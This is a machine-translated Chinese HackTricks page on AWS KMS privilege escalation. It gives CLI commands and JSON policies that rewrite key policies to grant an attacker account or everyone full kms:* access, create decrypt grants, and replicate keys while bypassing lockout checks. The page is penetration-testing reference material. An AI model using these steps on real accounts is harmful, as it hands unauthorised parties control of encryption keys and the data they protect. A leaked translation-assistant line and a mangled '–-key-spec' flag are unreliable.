AWS - KMS Privesc

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

KMS

有关 KMS 的更多信息请参阅:

AWS - KMS Enum

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

拥有这些权限可以修改密钥的访问权限,使其可被其他账户甚至任何人使用:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

请粘贴 policy.json 的内容。我会将其中的相关英文翻译成中文,并保持原有的 Markdown/HTML 语法、路径和标签不变。

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<origin_account>:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow all use",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": ["kms:*"],
"Resource": "*"
}
]
}

kms:CreateGrant

允许主体使用 KMS 密钥:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

Warning

grant 只能允许某些类型的操作: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

[!WARNING] 请注意,KMS 在生成 grant 后可能需要几分钟时间才能允许用户使用该密钥。一旦该时间过去,principal 就可以在不需要额外指定任何内容的情况下使用 KMS 密钥。
不过,如果需要立即使用该 grant,请 use a grant token(查看下面的代码)。
有关更多信息,请参阅 more info read this.

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

请注意,可以列出密钥的 grant:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

拥有这些权限时,可以将一个启用了 multi-region 的 KMS key 复制到另一个区域,并为其设置不同的策略。

因此,攻击者可能滥用此方法通过 privesc 获取对该密钥的访问权限并使用它。

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

kms:Decrypt

该权限允许使用密钥解密某些信息。
欲了解更多信息,请参阅:

AWS - KMS Post Exploitation

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks